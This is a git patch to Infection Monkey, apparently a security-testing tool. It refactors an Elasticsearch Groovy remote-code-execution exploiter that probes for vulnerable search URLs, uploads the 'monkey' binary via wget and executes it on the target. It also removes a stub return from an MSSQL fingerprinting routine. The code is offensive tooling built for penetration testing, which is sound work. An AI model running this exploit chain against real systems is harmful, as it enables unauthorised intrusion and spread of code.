From 76523e7379ce4652f77ecca478ba958c2aba5670 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Sat, 18 Aug 2018 16:49:33 +0300 Subject: [PATCH] Refactored elastic for latest framework changes --- infection_monkey/exploit/elasticgroovy.py | 28 +++++++------------ infection_monkey/network/mssql_fingerprint.py | 2 -- 2 files changed, 10 insertions(+), 20 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 51531957b..73fe359a5 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -8,11 +8,9 @@ import json import logging import requests from network.elasticfinger import ES_SERVICE, ES_PORT -from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from exploit.web_rce import WebRCE -from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED +from model import WGET_HTTP_UPLOAD -import copy import re __author__ = 'danielg' @@ -49,48 +47,42 @@ class ElasticGroovyExploiter(WebRCE): if ES_SERVICE not in self.host.services: LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) return False - # We need a reference to the exploiter for WebRCE framework to use - exploiter = self.exploit # Build url from host and elastic port(not https) - urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) + urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) vulnerable_urls = [] for url in urls: - if WebRCE.check_if_exploitable(exploiter, url): + if self.check_if_exploitable(url): vulnerable_urls.append(url) self._exploit_info['vulnerable_urls'] = vulnerable_urls if not vulnerable_urls: return False - # Extra escaping required: - config = copy.deepcopy(self._config) - config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" - config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" - - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): + if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True - if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + if not self.set_host_arch(vulnerable_urls[0]): return False commands = {'windows': self.RDP_CMDLINE_HTTP, 'linux': WGET_HTTP_UPLOAD} - data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) + data = self.upload_monkey(vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' - if data is not False and data['response'] == False: + if data is not False and data['response'] is False: return False - if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + if self.change_permissions(vulnerable_urls[0], data['path']) is False: return False - if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: + if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: return False return True def exploit(self, url, command): + command = re.sub(r"\\", r"\\\\\\\\", command) payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index ea4370d24..f973f3d87 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,8 +29,6 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - # TODO remove auto-return - return False assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout